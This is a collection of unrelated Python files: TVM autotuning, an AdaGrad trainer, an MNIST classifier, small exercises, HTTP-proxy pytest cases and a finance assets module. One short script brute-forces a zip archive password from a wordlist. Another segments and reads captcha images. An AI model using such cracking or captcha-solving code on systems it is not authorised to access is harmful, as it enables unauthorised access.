    cfg = autotvm.get_config()
    cfg.define_knob("split_oc", getSplit(int(oc.dom.extent)))
    if bias_tensor != None:
        cfg.define_knob("split_bias_c", getSplit(int(bias_c.dom.extent)))
    cfg.define_knob("split_pad_c", getSplit(int(pad_c.dom.extent)))
    cfg.define_knob("split_ic", getSplit(int(ic.dom.extent)))
    if bias_tensor != None:
        cfg.define_knob("split_bias_x", getSplit(int(bias_x.dom.extent)))
    cfg.define_knob("split_pad_x", getSplit(int(pad_x.dom.extent)))
    cfg.define_knob("split_x", getSplit(int(x.dom.extent)))
    if bias_tensor != None:
        cfg.define_knob("split_bias_y", getSplit(int(bias_y.dom.extent)))
    cfg.define_knob("split_pad_y", getSplit(int(pad_y.dom.extent)))
    cfg.define_knob("split_y", getSplit(int(y.dom.extent)))
    # optimize
    # conv: tile channel and spatial axes, outer loops first
    oco, oci = conv_op.split(oc, cfg["split_oc"].val)
    ico, ici = conv_op.split(ic, cfg["split_ic"].val)
    xo, xi = conv_op.split(x, cfg["split_x"].val)
    yo, yi = conv_op.split(y, cfg["split_y"].val)
    conv_op.reorder(oco, ico, xo, yo, oci, ici, xi, yi)
    # pad: same tiling scheme
    pad_co, pad_ci = pad_op.split(pad_c, cfg["split_pad_c"].val)
    pad_yo, pad_yi = pad_op.split(pad_y, cfg["split_pad_y"].val)
    pad_xo, pad_xi = pad_op.split(pad_x, cfg["split_pad_x"].val)
    pad_op.reorder(pad_co, pad_xo, pad_yo, pad_ci, pad_xi, pad_yi)
    # bias: same tiling scheme, only when a bias stage exists
    if bias_tensor != None:
        bias_co, bias_ci = bias_op.split(bias_c, cfg["split_bias_c"].val)
        bias_xo, bias_xi = bias_op.split(bias_x, cfg["split_bias_x"].val)
        bias_yo, bias_yi = bias_op.split(bias_y, cfg["split_bias_y"].val)
        bias_op.reorder(bias_co, bias_xo, bias_yo, bias_ci, bias_xi, bias_yi)
    # cfg.define_annotate("yi_unroll", [yi], policy='try_unroll')
    # pad_op.compute_inline() # too bad!
    return s, bufs
def auto_schedule(func, args):
    '''
    Auto-tune a schedule for `func` with AutoTVM and return the best one.
    func: compute-declaring function returning (ops, bufs); stored in the
          module-level `function` global read by the template functions
    args: argument tuple for func; 4 arguments selects the GEMM template,
          anything else the CONV template
    return: (schedule, buffers) rebuilt from the best tuning record
    '''
    global function
    function = func
    # start with an empty log; opening in 'w' mode already truncates, so the
    # original's explicit truncate() call was redundant
    with open("matmul.log", 'w', encoding="utf-8"):
        pass
    if len(args) == 4:
        config_sp_size = 100
        autotvmFunc = GEMMAutoTVM
    else:
        config_sp_size = 200
        autotvmFunc = CONVAutoTVM
    # (args) is just args -- superfluous parentheses removed
    task = autotvm.task.create(autotvmFunc, args=args, target='llvm')
    print(task.config_space)
    measure_option = autotvm.measure_option(
        builder='local',
        runner=autotvm.LocalRunner(number=3))
    # begin tuning, log records to file `matmul.log`
    tuner = autotvm.tuner.GATuner(task)
    tuner.tune(n_trial=config_sp_size,
               measure_option=measure_option,
               callbacks=[autotvm.callback.log_to_file('matmul.log')])
    # rebuild the best schedule found during tuning
    with autotvm.apply_history_best('matmul.log'):
        with tvm.target.create("llvm"):
            s, arg_bufs = autotvmFunc(*args)
    print(tvm.lower(s, arg_bufs, simple_mode=True))
    return s, arg_bufs
|
import numpy as np
import random
from monitor import monitor
'''
AdaGrad's intuition explaining
https://www.youtube.com/watch?v=0qUAb94CpOw
'''
def update_mini_batch(
        network, mini_batch, eta, lmbda, n,
        epsilon, AdaGrad_b, AdaGrad_w):
    """Perform one AdaGrad step on `network` from a single mini-batch.

    Accumulates backprop gradients over the batch, adds the squared
    (regularised) gradients to the AdaGrad accumulators, and updates the
    network's weights (with L2 term lmbda/n) and biases using per-parameter
    learning rates eta / sqrt(accumulator + epsilon).
    Returns the updated (AdaGrad_b, AdaGrad_w) accumulators.
    """
    batch_size = len(mini_batch)
    nabla_b = [np.zeros(b.shape) for b in network.biases]
    nabla_w = [np.zeros(w.shape) for w in network.weights]
    # sum the per-example gradients over the mini-batch
    for x, y in mini_batch:
        delta_b, delta_w = network.backprop(x, y)
        nabla_b = [acc + d for acc, d in zip(nabla_b, delta_b)]
        nabla_w = [acc + d for acc, d in zip(nabla_w, delta_w)]
    # accumulate squared gradients (weights include the L2 regularisation term)
    AdaGrad_b = [past + (gb / batch_size) ** 2
                 for past, gb in zip(AdaGrad_b, nabla_b)]
    AdaGrad_w = [past + (gw / batch_size + (lmbda / n) * w) ** 2
                 for past, gw, w in zip(AdaGrad_w, nabla_w, network.weights)]
    # parameter updates with per-parameter adaptive learning rates
    network.weights = [w - (eta / np.sqrt(aw + epsilon)) * (gw / batch_size + (lmbda / n) * w)
                       for w, gw, aw in zip(network.weights, nabla_w, AdaGrad_w)]
    network.biases = [b - (eta / np.sqrt(ab + epsilon)) * (gb / batch_size)
                      for b, gb, ab in zip(network.biases, nabla_b, AdaGrad_b)]
    return AdaGrad_b, AdaGrad_w
def AdaGrad(
        network, training_data, epochs, mini_batch_size, eta,
        epsilon=0.00000001, lmbda = 0.0,
        evaluation_data=None,
        monitor_evaluation_cost=False,
        monitor_evaluation_accuracy=False,
        monitor_training_cost=False,
        monitor_training_accuracy=False):
    """Train `network` with AdaGrad over mini-batch SGD (Python 2 code:
    note `xrange` and the print statement below).

    network: object with `biases`, `weights` and `backprop(x, y)`
    training_data: list of (x, y) pairs; shuffled in place each epoch
    epochs / mini_batch_size / eta: usual SGD hyper-parameters
    epsilon: numerical-stability term inside the AdaGrad square root
    lmbda: L2 regularisation strength
    monitor_*: flags forwarded to monitor() to record cost/accuracy
    return: (training_cost, training_accuracy,
             evaluation_cost, evaluation_accuracy) lists filled by monitor()
    """
    n = len(training_data)
    # per-parameter accumulators of squared gradients, start at zero
    AdaGrad_b = [np.zeros(b.shape) for b in network.biases]
    AdaGrad_w = [np.zeros(w.shape) for w in network.weights]
    evaluation_cost, evaluation_accuracy = [], []
    training_cost, training_accuracy = [], []
    for j in xrange(epochs):
        # fresh mini-batch partition each epoch
        random.shuffle(training_data)
        mini_batches = [
            training_data[k:k+mini_batch_size]
            for k in xrange(0, n, mini_batch_size)
        ]
        print "epochs[%d]" % j
        for mini_batch in mini_batches:
            # accumulators are threaded through every update
            AdaGrad_b, AdaGrad_w = update_mini_batch(
                network, mini_batch, eta, lmbda, n,
                epsilon, AdaGrad_b, AdaGrad_w
            )
        # record the requested cost/accuracy metrics after each epoch
        monitor(network, training_data, evaluation_data,
                training_cost,training_accuracy,evaluation_cost,evaluation_accuracy,
                lmbda,
                monitor_evaluation_cost, monitor_evaluation_accuracy,
                monitor_training_cost, monitor_training_accuracy)
    return training_cost, training_accuracy, evaluation_cost, evaluation_accuracy
|
def verifica_intervalo(N):
    """Read N integers from stdin and report how many lie inside [10, 20]."""
    dentro, fora = 0, 0
    for _ in range(N):
        X = int(input())
        # chained comparison instead of an explicit `and`
        if 10 <= X <= 20:
            dentro += 1
        else:
            fora += 1
    print(f'{dentro} in\n{fora} out')
def main():
    # first input line is the count of values to classify
    N = int(input())
    verifica_intervalo(N)
main()
from PIL import Image
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import sys,os
from net3 import model
import cPickle as pickle
def get_testdata(img):
    """Segment a 4-character captcha image and classify each character.

    img: image-like object (PIL image or array); pixels < 150 are treated as ink
    return: integer-like prediction, digits combined as d0*1000 + d1*100 + d2*10 + d3
    NOTE(review): Python 2 code (cPickle import at module level); also creates
    a new tf.InteractiveSession per character -- sessions are never closed.
    """
    # binarise: dark pixels become True/1 ("ink")
    img = np.array(img) < 150
    # pad with a 1-pixel zero border so 3x3 neighbourhoods are always valid
    a = np.zeros([img.shape[0]+2, img.shape[1]+2], dtype='float32')
    a[1:-1, 1:-1] = img
    img=a
    plt.imshow(img)
    plt.show()
    h,w = img.shape
    # despeckle: drop isolated ink pixels with too few ink neighbours
    for x in range(1,h-1):
        for y in range(1,w-1):
            surround_4 = img[x,y+1] + img[x-1, y] + img[x+1, y] + img[x,y-1]
            surround_4_x = img[x-1,y+1] + img[x+1,y+1] + img[x-1,y-1] + img[x+1,y-1]
            surround_8 = surround_4 + surround_4_x
            if img[x,y] and (surround_4 <= 1 or surround_8 <= 2):
                img[x,y] = 0
    # column ink counts; trim near-empty margins on both sides
    px=img.sum(0)
    i = 1
    j = px.shape[0] - 1
    while(i < j and px[i] <= 1): i+=1
    while(i < j and px[j] <= 1): j-=1
    img = img[:,i:j+1]
    px = img.sum(0)
    # initial guess: split the strip into 4 equal-width characters
    d = img.shape[1] / 4
    p1, p2, p3 = int(d), int(d * 2), int(d * 3)
    def fine_tune(start):
        # nudge each cut point toward a local minimum of column ink density
        for i in range(3):
            new_start = px[start-5:start+5].argmin() + start-5
            if start == new_start:
                # centre the cut inside a run of equally-sparse columns
                end = start
                while(end < w and px[start] == px[end]): end += 1
                return (start + end) >> 1
            start = new_start
        return start
    p1, p2, p3 = fine_tune(p1), fine_tune(p2), fine_tune(p3)
    child_img_list = []
    def crop(start, end):
        # centre the character slice inside a fixed 25x25 canvas
        a = np.zeros([25, 25])
        length = end - start
        edge = (25 - length) >> 1
        a[:,edge:edge+length] = img[1:-1, start:start+length]
        return a
    child_img=crop(0,p1)
    child_img_list.append(child_img)
    child_img=crop(p1,p2)
    child_img_list.append(child_img)
    child_img=crop(p2,p3)
    child_img_list.append(child_img)
    child_img=crop(p3,img.shape[1])
    child_img_list.append(child_img)
    img=child_img_list
    img=np.array(img)
    ss=0
    # classify each character and combine digits into one number
    for i in range(4):
        test_dataset=np.array(img[i],dtype='float32').reshape(-1,25,25,1)
        with open('/home/ouyangruo/Documents/BiShe/Model_one/args.pickle','rb') as f:
            args=pickle.loads(f.read())
        session = tf.InteractiveSession()
        test_prediction = model(test_dataset, args, False)
        result=np.argmax(test_prediction.eval(),1)
        # plt.title(result)
        # plt.imshow(img[i])
        # plt.show()
        if(i==0):
            ss=result*1000
        elif (i==1):
            ss=ss+result*100
        elif (i==2):
            ss=ss+result*10
        elif (i==3):
            ss=ss+result
    # NOTE(review): f is already closed by the `with` above; this is a no-op
    f.close()
    return ss
import sys
# redirect stdin so the scripted input() calls read from the test-case file
sys.stdin = open('minseok_assignment.txt', 'r')
T = int(input())
# for each test case: print the students (1..N) who did NOT hand in homework
for time in range(T):
    N, K = map(int, input().split())
    # split() already yields strings, so the original map(str, ...) was
    # redundant; a set gives O(1) membership tests instead of O(K) list scans
    finish = set(input().split())
    ans = [str(i) for i in range(1, N + 1) if str(i) not in finish]
    print('#{0} {1}'.format(time + 1, ' '.join(ans)))
import numpy as np
import tensorflow as tf
print(tf.__version__)
# tf.logging.set_verbosity(tf.logging.INFO)
# This implementation is loosly based on the implementation of huib. Offcourse everything is understood and adaptions have been made to make it a normal NN.
def cnn_model_fn(features, labels, mode):
    """Estimator model_fn: a fully-connected 784-300-300-10 MNIST classifier
    (despite the name, no convolutional layers are used).

    features: dict with key "x" holding batches of 28x28 images
    labels: integer class labels 0-9 (unused in PREDICT mode)
    mode: one of tf.estimator.ModeKeys.{TRAIN, EVAL, PREDICT}
    return: tf.estimator.EstimatorSpec appropriate for `mode`
    """
    # Input layer
    image1 = tf.cast(features["x"], tf.float32)
    input_layer = tf.reshape(image1, [-1,784]) # We have to reshape because the image is normaly formatted in 28x28.
    dense = tf.compat.v1.layers.dense(# We hope to find parts of the digit here.
        inputs=input_layer, # 784 input neurons go in here.
        units=300,
        activation=tf.nn.sigmoid
    )
    dense1 = tf.compat.v1.layers.dense( # We hope to find combination of above parts here.
        inputs=dense,
        units=300,
        activation=tf.nn.sigmoid
    )
    # Logits layer
    logits = tf.compat.v1.layers.dense(inputs=dense1, units=10) # 10 output nodes for 0-10 digits.
    predictions = {
        # Generate predictions (for PREDICT and EVAL mode)
        "classes": tf.argmax(input=logits, axis=1),
        # Add 'softmax_tensor' to the graph. It is used for PREDICT and by the 'logging_hook'
        "probabilities": tf.nn.softmax(logits, name="softmax_tensor")
    }
    if mode == tf.estimator.ModeKeys.PREDICT:
        return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)
    # Calculate loss (for both TRAIN and EVAL modes)
    onehot_labels = tf.one_hot(indices=tf.cast(labels, tf.int32), depth=10)
    loss = tf.compat.v1.losses.softmax_cross_entropy(onehot_labels=onehot_labels, logits=logits)
    # Configure the Training Op (for TRAIN)
    if mode == tf.estimator.ModeKeys.TRAIN:
        optimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.001)
        train_op = optimizer.minimize(
            loss=loss,
            global_step=tf.compat.v1.train.get_global_step()
        )
        return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
    # Add evaluation metrics (for EVAL mode)
    eval_metric_ops = {
        "accuracy": tf.compat.v1.metrics.accuracy(
            labels=labels, predictions=predictions["classes"]
        )
    }
    return tf.estimator.EstimatorSpec(
        mode=mode, loss=loss, eval_metric_ops=eval_metric_ops
    )
def main(unused_argv):
    """Train the MNIST classifier for 10000 steps and print eval metrics."""
    # Load training and eval data: ((train_x, train_y), (test_x, test_y))
    mnist = tf.keras.datasets.mnist.load_data()
    train_data = mnist[0][0]
    train_labels = mnist[0][1]
    eval_data = mnist[1][0]
    eval_labels = mnist[1][1]
    # Create the Estimator (checkpoints go to model_dir)
    mnist_classifier = tf.estimator.Estimator(
        model_fn=cnn_model_fn,
        model_dir="/tmp/mnist_convnet_model"
    )
    # Set up logging for predictions (hook is defined but not passed to train below)
    tensors_to_log = {"probabilities": "softmax_tensor"}
    logging_hook = tf.estimator.LoggingTensorHook(
        tensors=tensors_to_log, every_n_iter=50
    )
    # Train the model
    train_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn(
        x={"x": train_data},
        y=train_labels,
        batch_size=100, # We pass 100 images per weight update to tensorflow
        num_epochs=None,
        shuffle=True
    )
    mnist_classifier.train(
        input_fn=train_input_fn,
        steps=10000,
        # hooks=[logging_hook]
    )
    # Evaluate the model and print results
    eval_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn(
        x={"x": eval_data},
        y=eval_labels,
        num_epochs=1,
        shuffle=False
    )
    eval_results = mnist_classifier.evaluate(input_fn=eval_input_fn)
    print(eval_results)
# run main() under the TF app wrapper when executed as a script
if __name__ == "__main__":
    tf.compat.v1.app.run()
|
import os
from zipfile import ZipFile

# Dictionary attack on a password-protected zip archive.
# Fixed: Python's file APIs do NOT expand '~' -- the original literal
# "~/test3/..." pointed at a directory literally named '~'; use expanduser().
zf = ZipFile(os.path.expanduser("~/test3/aaa.zip"))
# `with` closes the dictionary file (the original left it open), and iterating
# the file object streams lines instead of loading them all via readlines()
with open(os.path.expanduser("~/test3/dictionary.txt")) as pass_file:
    for line in pass_file:
        password = line.strip("\n")
        try:
            zf.extractall(path=os.path.expanduser("~/test3/"),
                          pwd=password.encode("cp850", "replace"))
            print("\nPassword Found: {}\n".format(password))
            exit(0)
        except Exception:
            # wrong password (or corrupt entry) -- keep trying
            print("Searching... Bad password: {}".format(password))
            continue
|
import random
class Solution:
    def find_second_largest(self, nums):
        """Return the second largest distinct value in nums.

        Fixed: the accumulators previously started at 0, which produced a
        wrong answer (0) whenever every value was negative. They now start at
        -inf; -inf is returned when fewer than two distinct values exist.
        """
        max_1 = max_2 = float('-inf')
        for num in nums:
            if num > max_1:
                max_2 = max_1
                max_1 = num
            elif num > max_2 and num != max_1:
                # candidate for second place; duplicates of the max are skipped
                max_2 = num
        return max_2

    def find_kth_largest_element_2(self, nums, k):
        """Return the k-th largest element (1-based) by full sort, O(n log n)."""
        nums = sorted(nums, reverse=True)
        return nums[k - 1]

    def find_kth_largest_element(self, nums, k):
        """Return the k-th largest element (1-based) via randomized quickselect.

        Average O(n); duplicates of the pivot are handled by the middle band.
        """
        if not nums:
            return
        p = random.choice(nums)
        # partition into (greater, equal, less) relative to the pivot
        l, m, r = [x for x in nums if x > p], [x for x in nums if x == p], [x for x in nums if x < p]
        nums, i, j = l + m + r, len(l), len(l) + len(m)
        if k <= i:
            return self.find_kth_largest_element(nums[:i], k)
        elif k > j:
            return self.find_kth_largest_element(nums[j:], k - j)
        else:
            return nums[i]
# ad-hoc driver: expected output for this input is 9
s = Solution()
print(s.find_second_largest([1, 3, 2, 16, 3, 7, 9]))
|
#encoding='utf-8'
try:
    import os,sys,pytest,allure,time,re,time
except Exception as err:
    print('导入CPython内置函数库失败!错误信息如下:')
    print(err)
    sys.exit(0)# exit gracefully instead of letting the missing-module error crash the run
base_path=os.path.dirname(os.path.abspath(__file__))# directory containing this project file
base_path=base_path.replace('\\','/')
sys.path.insert(0,base_path)# add the project dir to sys.path so the config/helper modules below can be imported
print(base_path)
try:
    from iso_http_basic import index
    from iso_http_basic import message
    from common import fun
    import common.ssh as c_ssh
except Exception as err:
    print(
        '导入基础函数库失败!请检查相关文件是否存在.\n文件位于: ' + str(base_path) + '/common/ 目录下.\n分别为:pcap.py rabbitmq.py ssh.py\n错误信息如下:')
    print(err)
    sys.exit(0) # exit gracefully instead of crashing when the helper modules are missing
else:
    del sys.path[0] # remove the temporary sys.path entry right away to avoid duplicate-import issues
# import index
# del sys.path[0]
#dir_dir_path=os.path.abspath(os.path.join(os.getcwd()))
#sys.path.append(os.getcwd())
from common import clr_env
from common import baseinfo
from common.rabbitmq import *
from data_check import http_check
# timestamp of this test run, e.g. '2024-01-01 12:00:00'
datatime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
# device/broker endpoints taken from the shared base configuration
FrontDomain = baseinfo.BG8010FrontDomain
BackDomain = baseinfo.BG8010BackDomain
proxy_ip = baseinfo.BG8010FrontOpeIp
rbmExc = baseinfo.rbmExc
http_url = index.http_url
http_content = baseinfo.http_content
class Test_iso_http_basic():
    """End-to-end tests for the HTTP proxy policy under isolation mode.

    Each test pushes a policy to the front/back devices over RabbitMQ,
    waits for the nginx workers to come up, exercises the proxy (GET,
    file download, file upload) and finally removes the policy again.

    NOTE(review): the loop variable `re` used in the methods below shadows
    the imported `re` module; the module isn't used inside this class, but
    renaming the variable would be safer.
    """

    def setup_method(self):
        # Reset data-check state on both devices before every test.
        clr_env.data_check_setup_met(dut='FrontDut')
        clr_env.data_check_setup_met(dut='BackDut')

    def teardown_method(self):
        # Clean isolation state on both devices after every test.
        clr_env.iso_setup_class(dut='FrontDut')
        clr_env.iso_setup_class(dut='BackDut')

    def setup_class(self):
        """One-time setup: open SSH sessions and load per-case fixtures."""
        # Fetch parameters / open connections.
        fun.ssh_FrontDut.connect()
        fun.ssh_BackDut.connect()
        fun.ssh_BG8010Server.connect()
        fun.ssh_BG8010Client.connect()
        fun.ssh_httpServer.connect()
        # Expected command/output pairs for each test case (from index).
        self.case1_step1 = index.case1_step1
        self.case1_step11 = index.case1_step11
        self.case2_step1 = index.case2_step1
        self.case2_step11 = index.case2_step11
        self.case3_step1 = index.case3_step1
        self.case3_step11 = index.case3_step11
        # URLs and file-transfer parameters.
        self.http_url = index.http_url
        self.downfile_url = index.downfile_url
        self.downlocalPath = index.downlocalPath
        self.upfile_url = index.upfile_url
        self.upfilename = index.upfilename
        self.uplocalPath = index.uplocalPath
        self.upMIME_type = index.upMIME_type
        self.up_url = index.up_url
        clr_env.iso_setup_class(dut='FrontDut')
        clr_env.iso_setup_class(dut='BackDut')

    # @pytest.mark.skip(reason="skip")
    @allure.feature('验证隔离下的http代理策略')
    def test_iso_http_basic_a1(self):
        """Basic HTTP proxy policy under isolation: GET round-trip."""
        # Push the policy to both devices.
        fun.send(rbmExc, message.addhttp_front['AddCustomAppPolicy'], FrontDomain, base_path)
        fun.send(rbmExc, message.addhttp_back['AddCustomAppPolicy'], BackDomain, base_path)
        fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
        front_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
        assert front_res == 1
        fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
        back_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
        assert back_res == 1
        # Verify the configuration landed on the front device.
        for key in self.case1_step1:
            re = fun.wait_data(self.case1_step1[key][0], 'FrontDut', self.case1_step1[key][1], '配置', 100)
            print(re)
            assert self.case1_step1[key][1] in re
        for key in self.case1_step11:
            re = fun.wait_data(self.case1_step11[key][0], 'FrontDut', self.case1_step11[key][1], '配置', 100)
            print(re)
            assert self.case1_step11[key][1] in re
        # Issue a GET request through the proxy and check the body.
        print('请求地址为{}'.format(self.http_url))
        content = http_check.http_get(self.http_url)
        print('验证隔离下的http策略请求内容为:{}'.format(content))
        assert content == http_content
        # Remove the policy and restore a clean environment.
        fun.send(rbmExc, message.delhttp_front['DelCustomAppPolicy'], FrontDomain, base_path)
        fun.send(rbmExc, message.delhttp_back['DelCustomAppPolicy'], BackDomain, base_path)
        fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
        fdel_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
        assert fdel_res == 1
        fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
        bdel_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
        assert bdel_res == 1
        # Confirm the policy has been removed.
        for key in self.case1_step1:
            re = fun.wait_data(self.case1_step1[key][0], 'FrontDut', self.case1_step1[key][1], '配置', 100, flag='不存在')
            print(re)
            assert self.case1_step1[key][1] not in re

    # @pytest.mark.skip(reason="skip")
    @allure.feature('验证隔离下的http策略下载一个10M大小的文件')
    def test_iso_http_basic_a2(self):
        """HTTP policy under isolation: download a ~10 MB file."""
        # Push the policy to both devices.
        fun.send(rbmExc, message.addhttp_front['AddCustomAppPolicy'], FrontDomain, base_path)
        fun.send(rbmExc, message.addhttp_back['AddCustomAppPolicy'], BackDomain, base_path)
        fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
        front_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
        assert front_res == 1
        fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
        back_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
        assert back_res == 1
        # Verify the configuration landed on the front device.
        for key in self.case2_step1:
            re = fun.wait_data(self.case2_step1[key][0], 'FrontDut', self.case2_step1[key][1], '配置', 100)
            print(re)
            assert self.case2_step1[key][1] in re
        for key in self.case2_step11:
            re = fun.wait_data(self.case2_step11[key][0], 'FrontDut', self.case2_step11[key][1], '配置', 100)
            print(re)
            assert self.case2_step11[key][1] in re
        # Plain GET first to confirm the proxy path works.
        print('请求地址为{}'.format(http_url))
        content = http_check.http_get(http_url)
        print('验证隔离下的get请求内容为:{}'.format(content))
        # Download the ~10 MB file through the policy.
        print('下载的服务器地址为{}'.format(self.downfile_url))
        result = http_check.http_download(self.downfile_url, self.downlocalPath)
        assert result == 1
        # Check the downloaded file size is roughly 10 MB.
        file_size = os.path.getsize(self.downlocalPath)
        file_size = file_size / float(1024 * 1024)  # Convert bytes to MiB.
        assert 9.5 <= file_size <= 10.5
        # Remove the policy and restore a clean environment.
        fun.send(rbmExc, message.delhttp_front['DelCustomAppPolicy'], FrontDomain, base_path)
        fun.send(rbmExc, message.delhttp_back['DelCustomAppPolicy'], BackDomain, base_path)
        fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
        fdel_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
        assert fdel_res == 1
        fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
        bdel_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
        assert bdel_res == 1
        # Confirm the policy has been removed.
        for key in self.case2_step1:
            re = fun.wait_data(self.case2_step1[key][0], 'FrontDut', self.case2_step1[key][1], '配置', 100, flag='不存在')
            print(re)
            assert self.case2_step1[key][1] not in re

    # @pytest.mark.skip(reason="skip")
    @allure.feature('验证隔离下的http策略上传一个10M大小的文件')
    def test_iso_http_basic_a3(self):
        """HTTP policy under isolation: upload a ~10 MB file via POST."""
        # Push the POST-capable policy to both devices.
        fun.send(rbmExc, message.addhttp_front_post['AddCustomAppPolicy'], FrontDomain, base_path)
        fun.send(rbmExc, message.addhttp_back_post['AddCustomAppPolicy'], BackDomain, base_path)
        fun.wait_data('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process')
        front_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
        assert front_res == 1
        fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
        back_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
        assert back_res == 1
        # Verify the configuration landed on the front device.
        for key in self.case3_step1:
            re = fun.wait_data(self.case3_step1[key][0], 'FrontDut', self.case3_step1[key][1], '配置', 100)
            print(re)
            assert self.case3_step1[key][1] in re
        for key in self.case3_step11:
            re = fun.wait_data(self.case3_step11[key][0], 'FrontDut', self.case3_step11[key][1], '配置', 100)
            print(re)
            assert self.case3_step11[key][1] in re
        # Initialization: make sure no stale post.txt exists on the server.
        post_file = fun.search('/home/lwq', 'txt', 'BG8010Server')
        print(post_file)
        if 'post.txt' in post_file:
            fun.cmd('rm -f /home/lwq/post.txt ','BG8010Server')
        # Start the POST upload service on the HTTP server (in a thread).
        post_cmd = ['cd /home/lwq','python3 Server.py']
        fun.cmd(post_cmd,'httpServer',thread=1,list_flag=True)
        # Plain POST first to confirm the proxy path works.
        print('请求地址为{}'.format(self.up_url))
        content = http_check.http_post(self.up_url)
        print('post普通请求的请求内容为:{}'.format(content))
        # Upload the ~10 MB file through the policy.
        print('上传的服务器地址为{}'.format(self.upfile_url))
        result = http_check.http_upload(self.upfile_url, self.upfilename, self.uplocalPath, self.upMIME_type)
        assert result == 1
        # Check that the upload produced post.txt on the server.
        post_file = fun.search('/home/lwq','txt','httpServer')
        print('检查/home/lwq/目录下所有以txt结尾的文件列表为:{}'.format(post_file))
        assert 'post.txt' in post_file
        # Remove the policy and restore a clean environment.
        fun.send(rbmExc, message.delhttp_front_post['DelCustomAppPolicy'], FrontDomain, base_path)
        fun.send(rbmExc, message.delhttp_back_post['DelCustomAppPolicy'], BackDomain, base_path)
        # NOTE(review): unlike a1/a2, there is no fun.wait_data(...) for
        # 'FrontDut' before this check — confirm whether the omission is
        # intentional.
        fdel_res = fun.nginx_worker('ps -ef |grep nginx', 'FrontDut', 'nginx: worker process',name='前置机nginx进程')
        assert fdel_res == 1
        fun.wait_data('ps -ef |grep nginx', 'BackDut', 'nginx: worker process')
        bdel_res = fun.nginx_worker('ps -ef |grep nginx', 'BackDut', 'nginx: worker process',name='后置机nginx进程')
        assert bdel_res == 1
        # Confirm the policy has been removed.
        for key in self.case3_step1:
            re = fun.wait_data(self.case3_step1[key][0], 'FrontDut', self.case3_step1[key][1], '配置', 100, flag='不存在')
            print(re)
            assert self.case3_step1[key][1] not in re

    def teardown_class(self):
        """One-time teardown: recycle the environment and close sessions."""
        # Recycle / clean up the environment.
        clr_env.iso_teardown_met('http', base_path)
        clr_env.iso_teardown_met('http_post', base_path)
        clr_env.iso_setup_class(dut='FrontDut')
        clr_env.iso_setup_class(dut='BackDut')
        fun.rbm_close()
        fun.ssh_close('FrontDut')
        fun.ssh_close('BackDut')
|
"""This module contains implementation of all the standard asset types.
The top-level interface which every asset type must implement is
lakshmi.assets.Asset. This class also contains helper functions that
operate on an asset type.
"""
import datetime
import re
from abc import ABC, abstractmethod
import requests
import yfinance
import lakshmi.constants
import lakshmi.utils as utils
from lakshmi.cache import Cacheable, cache
from lakshmi.table import Table
def to_dict(asset):
    """Serialize *asset* into a single-key dictionary.

    The key is the asset's class name and the value is the asset's own
    dictionary representation, which makes the result easy to dump to
    yaml and later restore with lakshmi.assets.from_dict (the inverse of
    this function).

    Args:
        asset: An object of a class implementing the lakshmi.assets.Asset
            interface.

    Returns: A dictionary representation of asset.
    """
    class_name = asset.__class__.__name__
    return {class_name: asset.to_dict()}
def from_dict(d):
    """Convert a dictionary representation back into an asset object.

    This is the inverse of lakshmi.assets.to_dict: the single key of d
    names the asset class and its value holds that class's serialized
    fields.

    Args:
        d: A dictionary representing an asset type.

    Returns: An object of the matching class implementing the
        lakshmi.assets.Asset interface.

    Raises: AssertionError if d doesn't represent a lakshmi asset type.
    """
    keys = list(d.keys())
    assert len(keys) == 1
    class_name = keys[0]
    matches = [c for c in CLASSES if c.__name__ == class_name]
    if matches:
        return matches[0].from_dict(d.pop(class_name))
    raise AssertionError(f'Class {class_name} not found.')
class Asset(ABC):
    """Base class for every asset (fund, ETF, cash, etc.) in lakshmi.

    Concrete asset types must subclass this and implement value(),
    name() and short_name().
    """

    def __init__(self, class2ratio):
        """
        Args:
            class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0

        Raises: AssertionError if any ratio is outside (0, 1] or if the
            ratios across all class names don't add up to 1.
        """
        self._delta = 0  # Accumulated "what if" adjustment on top of value().
        self.class2ratio = class2ratio

        for ratio in class2ratio.values():
            assert 0.0 < ratio <= 1.0, (
                f'Bad Class ratio provided to Asset ({ratio})')
        total = sum(class2ratio.values())
        assert abs(total - 1.0) < 1e-6, (
            'Total allocation to classes must be 100% (actual = '
            f'{total * 100}%)')

    def to_dict(self):
        """Encode this object into a dictionary.

        Only the 'What if' delta is encoded at this level; sub-classes
        are responsible for encoding their own constructor fields.

        Returns: A dictionary object representing self.
        """
        return {'What if': self._delta} if self._delta != 0 else dict()
